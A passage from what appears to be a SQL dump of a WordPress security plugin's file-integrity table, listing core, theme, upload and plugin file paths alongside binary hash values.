ե�','',0,'?'),('P�gg`\n�������Q','wp-content/uploads/2021/08/home-improvements-300x206.jpg',0,']�ҹ$�pL��T;',']�ҹ$�pL��T;','5?^�c���ԕ�W,K�xm�3������ى&','',0,'?'),('P��h���~��P�','wp-includes/blocks/page-list/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�� d�p����Ur','4QNs��Ò��v�v��7D��b�`0f�0�gg','',0,'?'),('P��\n�e���u�\"�','wp-includes/sodium_compat/lib/php72compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��B�c��f4�[�\\','\'�{~���V�A(�p�X���ȵ�E/�','',0,'?'),('P��y����Xn��','wp-content/plugins/wp-cerber/assets/flags/an.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��B����\ZEs�F\r�8','���Z��iLz�q`�{ۯۇn �fN�zY3i�','',0,'?'),('P�a�l&��:�)V�I�','wp-content/plugins/wp-cerber/assets/flags/ax.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l���ho��%>��T�','Ku*Q(�g�iC�`i0�����ȇ�R.�c���','',0,'?'),('Pè�&R�{(6�M�]8','wp-content/plugins/wordpress-seo/admin/views/tabs/dashboard/dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I �s�� z���4�','S�C/Ik^d&�m���lJ3�d�`&c{ܺ�:','',0,'?'),('P�@���;b<\n�c�','wp-includes/class-wp-oembed-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','͕��ha�p���^��f','��Lz�A{�@g�\0����{Γؼqx҆X','',0,'?'),('P�M�\Z�I̸�ݭY`r','wp-content/plugins/wordfence/lib/wfHelperString.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Euƻ\\S w?,�_�L`','��� ��i�Lƛw���6�_���,n�2S��Zh)','',0,'?'),('P��J1h��|���r�','wp-content/plugins/wordpress-seo/inc/class-wpseo-custom-taxonomies.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4��3����,','U�0`��7(t���Y��s�\\�h�tr(\'ݩ1�','',0,'?'),('P��[�,i��@�$�L','wp-content/uploads/2019/10/plumbing3-350x220.jpg',0,'%)B�5���ui��X','%)B�5���ui��X','u�`��s�ń&�%���ڧTC\\ zq�+�S','',0,'?'),('P�1$���\\*�C','wp-admin/images/stars-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A���#�S�Me.^','[��耿�_(\rh���Y���T��qZ��','',0,'?'),('P��0��a��R�z= ','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3�gkeͿݾ���|�h','�H��zj鞨%�����p=�Z��iNA�Z�','',0,'?'),('P���VV�N{��j-','wp-content/plugins/wordpress-seo/admin/exceptions/class-file-size-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�iy�v��#<��Q!��','�r���kv�\")6�B}�zE8�7R���E�','',0,'?'),('Q�zC4�Kir��~_','wp-content/themes/vega/color-schemes/blue.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$+ȃ7����f�]','G�s|EL�E��`��c\Z�8y!�>�l\n�','',0,'?'),('Q;���(����Mp*�','wp-admin/js/widgets/media-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$M�8]Jb�=EK��','���������:�U�{Fd���F�Zw�ZyG','',0,'?'),('QC�ȧ���$9B)��M','wp-includes/blocks/tag-cloud/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y���i�\0�չ~f','t�o���SaV�4A���)ޞ[��IL�T�|Ӭ5','',0,'?'),('QG3��G]^pXS~��','wp-content/plugins/wordpress-seo/src/conditionals/semrush-enabled-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-I�\Zʑ*0\Z���7�','��\"-_z/�VFd�a���{�vp<f��i���&','',0,'?'),('QJ���s3�R�aU*�s','wp-content/themes/twentynineteen/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���հ&��Tgs\r','0�ed ��s��X������Q8���3�Z��','',0,'?'),('QT���*�f�P��.�','wp-admin/includes/file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\vy��S�t�A�','w�r�Q�sxϐ�G��8R%�䯶1f�����','',0,'?'),('QY��1�Tl��Vr<','wp-includes/js/customize-views.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"r�<`����D��','b2�M��!o�;�-�veq��\\f�]l����:','',0,'?'),('QuoPX��\0��Sڞ','wp-admin/images/bubble_bg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�g<ć�I����0','\'+u�W�`-A�����S\'�}S~S��b���','',0,'?'),('Qwa��t%F�%2��','wp-content/themes/twentytwenty/templates/template-full-width.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[6i\"Y|���f8K','Hh�E�.P�ڬ�.��M��eMo�@\0��W�','',0,'?'),('Q��cm�uX\Z3�B+��X','wp-content/plugins/wordfence/views/gdpr/disabled-overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�0M/�}�*��Hkt','��qb�{�^в���4#\\�����xkW�~[�4','',0,'?'),('Q���PA���鐚�z�','wp-includes/blocks/columns/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�_Pwx�RC=2R','��v+)�l6��F7�F�$��4\"�|n\0}','',0,'?'),('Q�Q�ٗ�%5bSx��J�','wp-content/uploads/2019/08/electrician-768x510.jpg',0,'����o��(���Æ�I','����o��(���Æ�I','�Z=F7E� 9#p��v�U������L9秪A�','',0,'?'),('Q�)+���m8J�c���','wp-content/themes/vega/assets/js/wow.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/���=�1','Pl|X oa�I9�(��Ӣ��4�CI336����B','',0,'?'),('Q�t��$oGoE�$�:�','wp-content/plugins/wp-cerber/assets/flags/sy.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�oi�&\0�0$l6��','�/<7�\n�W�6�H~�G�K \"�L���','',0,'?'),('Q�EBfqHgs!����','wp-content/uploads/2019/08/Case-study-300x250.jpg',0,'��G����Y��#-��a','��G����Y��#-��a','%�]�����]�\rΏ�据�Qt�Z�?����','',0,'?'),('Q��6K4������H','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xAI6m�NdSpVBׇ','Z?�RA��+�7#�C�-�\\4g[o?J�_�g','',0,'?'),('Q�x��̿Py���\'uE|','wp-includes/blocks/page-list/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}���~6�[��s���','�/E|r^�#}�j�㽬]qv�A� ������','',0,'?'),('Q��-�C-]C����','wp-includes/sitemaps/class-wp-sitemaps-stylesheet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%���\nG\n���R6','���v$�͏���,��5�6X�~Xʧ��ℐ���','',0,'?'),('Q�`���8�M�8','wp-admin/press-this.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'xq��>�/���EQ�L','>��k�(���B�������h\\�ѫ͜:','',0,'?'),('Q��4��%��z�>*��I','wp-content/plugins/wordpress-seo/inc/class-upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V3��hR��{��\"','��]�k��r�s�.*�\Z�]`��\\�~�K�\0N','',0,'?'),('Qˢ�I��E��Z0k','wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-seopressor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�ü8֍2�q���','O��ޠe�[�(�[��_��ǨLd�9J)Yy','',0,'?'),('Q�\0�Zx��w�=\'���','wp-content/plugins/wordpress-seo/languages/yoast-components-hi_IN.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ƃ�ٓ�\\G�1u�','�\0�>r��������2#�m���Ux��\'','',0,'?'),('Q�Y�Qf�7�@2xC','wp-content/themes/twentynineteen/images/pattern_02.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ߢБ^N\0�[1#U','OH[�Byj��[�#��A縬8Ė�_7 r�','',0,'?'),('Q�.ì�\\���XeOI','wp-content/plugins/wordfence/views/dashboard/options-group-general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�F��Y��\"�4\\�','fN���ϻ`�\nq�^�Z\Z~�<��\'�I[�!�','',0,'?'),('Q�����l��g�-��','wp-admin/js/comment.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8�t��(-��p�y\r�','Ȋ����;|�X��1�Ij6���g[��5�','',0,'?'),('R�v5��W6�`�ھ�','wp-includes/css/dist/nux/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z+�n���.U��hSz>','�ItV�(�|����D(��;��fܱh������H','',0,'?'),('R!�ld�� _�#','wp-content/uploads/2019/10/plumbing-300x199.jpg',0,' T4� D�T^�Ԝ-c�',' T4� D�T^�Ԝ-c�','}�����,v/��hV�E?�g���)��','',0,'?'),('R3�Us�3��}T��','wp-includes/js/autosave.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Nj�cJ�n�H�\'','��T%��#�5r����c5��꘩����m7','',0,'?'),('RQ�b7f�� |~ۓ�(','wp-admin/js/widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4�>�A�P�P�u4Ą�','�����v�5ᐪmє\"-�*~`�`Qg1F��/','',0,'?'),('Ra��ce��JT�','wp-content/themes/twentytwentyone/assets/sass/03-generic/clearings.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3I�w>��A�\n�','������F��\0O�.Qm+v�Hj�E�odFX�','',0,'?'),('Rg���D��I�k','wp-content/languages/en_GB-7233008897033de5ee0d14f86a42a65a.json',0,'@�����Ğ���E�7','@�����Ğ���E�7','!�@�)�%u��P ��Z���Y�\n�̽b�6��','',0,'?'),('Rhz���%�s!ӇVd','wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B!���,����ۭ��','&��\Z>i���q���;�)Z�RIe�`�LC�&��','',0,'?'),('Rj�q�Iӏ\Z�Y&�','wp-includes/sodium_compat/src/Core/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���0\rJ`X�\"8�by','oHi��Y�N3 >����_����J�,���S^','',0,'?'),('R��F�E��A�5�r�','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/general/knowledge-graph.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','֕������@�%g�c','&���+�3=m���U��M{��c�#�F��','',0,'?'),('R���1?���Y�VDt�','wp-content/plugins/wordfence/lib/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E\"xK��{�8�dS�','C����\'r�9��@�K�ކt�����w#@k�','',0,'?'),('R�b�:Z�K��L�','wp-admin/js/application-passwords.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','An��f�.t�7H�t��','�E��\0��D�.�<��\'���iZAƬ4n�','',0,'?'),('R����q8U�{\0��','wp-content/plugins/wordpress-seo/src/surfaces/open-graph-helpers-surface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i��ϑz��א�','Q���?���X�L���(аӸ|ᑴmS[��Hk','',0,'?'),('R��A���H=��W�>�a','wp-content/plugins/wordpress-seo/src/integrations/integration-interface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q��0\0N���D �F�','�Sl��fA� O� �w|=EB͐�Df���q','',0,'?'),('R�x�4Mp@�9u\n֊ p','wp-includes/images/wpspin.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hk�u�R�\r@9k���','���!�Fױ����(���#��1��:�','',0,'?'),('R��|Rx/�bzn9\0*�J','wp-admin/includes/plugin-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>Y�``��_���','��ڨ��c���:Wv�Y�м�mz�����cQ�\r','',0,'?'),('R�\\SC�|ju�9��A','wp-includes/js/media-grid.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?Z��e��ʠ','��.R%/��F��v`����R�j���>�О','',0,'?'),('R¥�����Le�q �&�','wp-admin/js/user-suggest.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jl�,��f.�Vh��','��\ZԂ 8�՜g\\����IS�����グ6���','',0,'?'),('R��ܰoL�8~\\�lCR','wp-includes/blocks/audio/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T,G\\2*eA���~��','�6SN�\'�ct�<\n,HW��01����K','',0,'?'),('R�H\r0��!�d�?c&','wp-includes/widgets/class-wp-widget-categories.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�����\"��0�S`�','n��pޯ�J��w��2��c�QdN�p�o,��','',0,'?'),('R��G5�����to�$o','wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-greg-high-performance-seo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z\\��3\rfKct��L�','l�9X.���(������g���Z��SJ:(�*','',0,'?'),('S?�d�xS���َ@','wp-includes/blocks/query-pagination/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���[��?��m$�a','��O�Gd6G�Kv55ɮ���qc\06.�(�AW�;','',0,'?'),('S+w�!&�\Z�\"��G}�','wp-content/plugins/wordpress-seo/src/deprecated/inc/class-wpseo-validator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rjM��n��s�X�_�','�T��Xjuei�vW�.�b*�u8�^�O�q���','',0,'?'),('S.FȫA�j���(�:','wp-includes/js/hoverIntent.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"��T���Ҩ�b~','G��OEr~�\'ǟ���9��\Z:)�g�-','',0,'?'),('S0�־��K/17u���','wp-includes/js/jquery/ui/selectmenu.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��Wj*m��Es�','�l$1dT��z֬�H\r���*�xQ��,e4e','',0,'?'),('SG}�E�ضW@�\\�f�}','wp-content/plugins/wordpress-seo/src/schema-templates/recipe-name.block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʹOG��K��Պ�`','���[=;�d��l�-���륌Z-��u�^�Ua','',0,'?'),('SLdt���Q®���','wp-content/plugins/redirection/database/schema/233.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����=�Gq d�4�r','$���4� ����Pc�M��)K\\�g2�=ѯ`�','',0,'?'),('SX+7�1?���-','wp-includes/js/jcrop/Jcrop.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��7e�����Q�%K','!��@��X�7JŃ��p�3K�;S*!���L','',0,'?'),('Sj�~6��{�����X','wp-admin/css/colors/modern/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��w�!�<�.{��=','�N_FT\Z�B�/�d,-���ب��39��d_�','',0,'?'),('SzW��NKUS��','wp-includes/blocks/calendar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�����cE8,\n','�O%�7ܧ�^V�x��n~���\r�8���i.3-','',0,'?'),('S���O[N�.�v�e','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('S��}i��2��)];�','wp-content/uploads/2016/11/cropped-lost-places.jpg',0,'��؋�@z�yٶ~�m�','��؋�@z�yٶ~�m�','+��1D^W�H�s���?�D���kH�A_��]�','',0,'?'),('S�C��i1ۭ�j�','wp-content/plugins/wordfence/modules/login-security/classes/controller/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%��|�6�V!�;O','�J��DƜ������.�[������)�{�','',0,'?'),('S����p�>��Wr�YE','wp-comments-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.K��OQ ��ga��','LJ��h��`*�dr�}�6-�߁P�Q��{�','',0,'?'),('S�dlz�s�V7','wp-content/plugins/wordfence/vendor/maxmind-db/reader/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V�~МI�XP/��$','�s�em��/�;��֘���� aZ�H`�g3','',0,'?'),('S��l�+d{�\0%�L�','wp-content/plugins/wordpress-seo/src/presenters/admin/indexing-notification-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�F����~�s��i�','�vzb�@�Q\\ãs,����g�*���z��Y','',0,'?'),('S�����չ~��s�e�','wp-content/uploads/2019/08/renewable-energy-300x169.jpg',0,'�U����+�)����8','�U����+�)����8','��UM�S������+��]5#�����','',0,'?'),('S��t� ��J�9���G','wp-includes/css/dist/block-directory/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����(�3�3i�ָ�','���]9@�T�Tx�k���>��v�\0Yi�~H,0','',0,'?'),('S���\n�pލG%�','wp-content/plugins/wordfence/crypto/vendor/composer/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]_�#D���\0��','\Z ��ے�%�4~N�~Gh!b��:w��Ɍ��\'','',0,'?'),('S��&�az8�Jض9�','wp-includes/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����{�\n��[��F3җ','��H�d\nh� ��/X���qF��.����H���','',0,'?'),('S�!)q���O�����','wp-content/plugins/wp-cerber/languages/wp-cerber-fr_FR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WG=E7}�>C&�$�','j�?�nlFR�|�qY�^�^}P�o����4r�','',0,'?'),('S�^�7jK5I6K�2!','wp-includes/Requests/Cookie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�V���sUN���d�','\"��+f5f(gdC��<i�˳]uƨ2�ļ','',0,'?'),('S�\\8z;�X��8�','wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-term-watcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�u���0�ԓK��','� }9���� ��){���(gϴ��M�\\<J0�d','',0,'?'),('T�r���~�W]�','wp-includes/class-wp-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J0n�N.��yƪb��','�}�u\0tE\n�&���yt2���B���','',0,'?'),('T\Z�A\\�cǓ�KP�Ă&','wp-content/uploads/2019/10/plumbing4-150x150.jpg',0,'�Y>�@�f���\'|h�','�Y>�@�f���\'|h�','!\0biZ(�$H} �w\"�A��E�ڶ�g]Q���','',0,'?'),('T6K?���s� �7(�','wp-includes/customize/class-wp-customize-sidebar-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Vj��B���ر���q','��{#�i�`��\0���j���` pǍ+�fF�','',0,'?'),('T:�Dğ.&l�\Z?�&�A','wp-content/plugins/wp-cerber/assets/flags/in.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�weIɻ�j籏��{\n','��4x�\n��<~�z����{��V��Я\"N�','',0,'?'),('T?�?:qP��ah\'��','wp-content/plugins/wordfence/views/reports/activity-report-email-inline.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���AN�X[`h\0����','�\"xI�B6�E?�����i�\'26�5y/��','',0,'?'),('TM����l����','wp-admin/includes/class-wp-screen.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O\'<r,x�ib��$','MqރR�3=E�8C�@^��@ò�~�qv�M���','',0,'?'),('Tg8�Z��X�\r�^-','wp-content/plugins/wordpress-seo/src/deprecated/src/presenters/admin/indexation-modal-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�12������R|','���NI�y-�X�I1{�܀<G�08%iKԵn`t�','',0,'?'),('Tw��=��+�6����','wp-includes/js/tinymce/wp-tinymce.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���A�f��\'2|0��5','����P�s $d}ё%����H��8�','',0,'?'),('T{\'���g,(:~�G','wp-content/themes/twentynineteen/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڈLBP��En�\\^ ��P','�RSV%�6�){��O����x2��N�A���','',0,'?'),('T�.o@Ψ2�w�v��X�','wp-includes/js/jcrop/jquery.Jcrop.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/a��Lru�4�\Z�','���Ϸ��yd�ix�{�p+��n�eځ��f�','',0,'?'),('T���vm?,�a���T4�','wp-includes/ID3/module.audio-video.quicktime.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ր��%���3/�*','Z{��[�W�ڤ�ʑ\nM%9I5+�$3�@^�','',0,'?'),('T��5�O�+���h�%','wp-content/languages/en_GB-9c3519f4870fac83dc0dbf18cb6bd4c4.json',0,'\0Q��x���sHnD�','\0Q��x���sHnD�','}�~��Ϫ��.e=n�����Փ>��ʹބ\r','',0,'?'),('T���\r�fV�+� j�','wp-content/plugins/wordfence/modules/login-security/views/page/tabbar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gxX��JT��bx���','f��x�/�x��G�\n8�5�6� Z�+','',0,'?'),('T�>��<�_\"g','wp-content/plugins/wp-cerber/assets/flags/nf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2���rJizڜS��','�P�w�.�^}��\Z�ފڝ3q�{���','',0,'?'),('T��`5���2z/>�w','wp-includes/blocks/query-pagination/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�̽����@}�l���','��{�;�т�6�<�s��\r\'~�y�2��2LT-r','',0,'?'),('T�.��)m�&����I','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/HttpException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�41l#}�p���zk1','��h�� �_��֚����!E��4�\Zv��F��','',0,'?'),('T܌�7`\0���(�','wp-includes/js/mediaelement/renderers/vimeo.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C9���Y�O���','���+�®-FVp�ݨIht�L�iP%K��i��6','',0,'?'),('T���0_y9���ӱ','wp-content/uploads/2016/11/taupe-kitchen-cabinets-contemporary-with-range-in-island-wine-and-bottle-openers-300x250.jpg',0,'C�\r;� DÍ��,\0+�','C�\r;� DÍ��,\0+�','��+;�-�B��`_1p����:�7���J;��','',0,'?'),('U���4|)-�\0','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/ca.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f�E�:H�=��Ba}','LO��5~��sC�b�.���g��ʲ\0�7\"Z','',0,'?'),('U�\\p{J��O�Q�&','wp-includes/SimplePie/Cache/Base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�ĞA�ʖ�䦴j��','��oO��w��~9K����4oY�[K�e��\\RG','',0,'?'),('U6�Mӌ��TR7S��','wp-content/languages/en_GB.po',0,'Q3�t<�$_3]l�Z','Q3�t<�$_3]l�Z','A��3�^��G]y�� |�jÀ\n9�9,�V','',0,'?'),('UI�_����Ym���_','wp-content/plugins/wordfence/lib/menu_tools_livetraffic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o\\��%k�&�е��','WW��?���,#zNt���� qC����.g�F','',0,'?'),('ULA\'�7V���gK','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/breadcrumbs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-�!�ur�`��}','�6��>�\r �YwY�&�W�U/�xҜIV�','',0,'?'),('Ue�tA&�R|��\rQV','wp-content/themes/twentytwentyone/assets/sass/04-elements/forms-editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')����Xgr�~�\r�W�','A�Hg��[rG�^���kΘ���i��<�\0�','',0,'?'),('Uf��\\%���J7','wp-content/plugins/redirection/models/flusher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']P�R=H�F�u/����','����+qϋ>�9����l�F�VɊ�z�e\\','',0,'?'),('UgЮA�D�eN\\ڛм','wp-content/plugins/wordpress-seo/src/generators/schema/faq.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���}U�8o�n\nX�',']Qoz����<:d��:�k)�j��\n���','',0,'?'),('U�.��G\0��h7K','wp-content/plugins/wordfence/modules/login-security/classes/model/view/tab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{��Dz��겊��T','s�my(�[�~��M������N�Ԙ��;i','',0,'?'),('U� $A=�He�|�zȖ(','wp-includes/Requests/SSL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��SUa �o�����','�&�K��ps֍y�\Z�@?7G��c��#EU�','',0,'?'),('U���A�T�k�V[&','wp-content/plugins/wordpress-seo/languages/yoast-components-es_AR.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r^Kk�,�iAF���','�YPMZ��\\:��A�<s?��B�@�l���','',0,'?'),('U��(��4�,yr��Ԭ','wp-content/plugins/wordpress-seo/admin/class-helpscout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-��lj�9~X','�t5���F��A����)>�\\��Hɝ�C�,/1Ӛ','',0,'?'),('U�nɓb4lZ,I','wp-admin/css/about-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VUKI�L�%[��#�p','��y�=�Ϻ�r��w�s�r������b��','',0,'?'),('U�~�UO:c#3#W��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-configure-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� ,� ^��R6Մ��l','�&x{�e5��ɔ�|��c��J��\Z���Ȓ','',0,'?'),('U���$i\"u��&��9','wp-includes/images/crystal/video.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���l��ڤ�;�=','��S\rI��U��9_<�f`��&HYw�u�','',0,'?'),('U�^�� H�T�7j','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-audio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\'���Y�p','�����,�\"w�,��L� Rj\0��)M�o�','',0,'?'),('V\n��U`�_�5���8','wp-includes/js/customize-base.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@a���<����','eƭ�ǃ��=���ܠFB}�:�r�bb��l','',0,'?'),('V��<�7G�n���','wp-includes/blocks/separator/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����=2cRPm�`mL�','�y.�Y&�N �\r�M�����\Z�B���','',0,'?'),('V���\Z��_�R��','wp-content/themes/twentynineteen/js/priority-menu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�~&*mB��T@�GI�','D(�Tu}5{������ \0+��5g7`�)�y�','',0,'?'),('V�\r�3#��J��{','wp-includes/sodium_compat/composer.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X�7�{(G5��','5<��H���X0���t�>�-�������','',0,'?'),('V#7A�����@�?���)','wp-content/plugins/wordfence/views/unsupported-php/admin-message.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(`��HMD��A�7�9','y��I~ @V�Y247�&�U��uމ����','',0,'?'),('V2�L��\0ۺ��','wp-includes/js/jquery/ui/controlgroup.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�##�=�F=��\\�v','��>733hE}���z�[)�e�Z0�ߨ!�$/Ӿ�','',0,'?'),('V8��8��ߟ\rZ�5','wp-content/themes/twentynineteen/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q��n䄼��a�','�4�x\"�#�4�ϙ��w2�E��7�l�4�1�','',0,'?'),('V?�O�N���e�ZF\\�','wp-includes/js/jquery/ui/accordion.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������Z����a��','�\"����!f�~xXW��ۜ��4�Ȗ$:��2/','',0,'?'),('VE��8�k�b�g&:,','wp-includes/blocks/post-content/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+c;N��/�ݠv�.','��\Z�$��#�k\\=�����Z��G�v��܌o','',0,'?'),('VK�m1�8����6h1a','wp-content/plugins/wordpress-seo/languages/wordpress-seojs-fr_FR.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>�\n�w>}��e~��','L*��_A���(�]5\"��Qk���s\n','',0,'?'),('VL6�7G^l%D5z3��','wp-includes/default-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �B 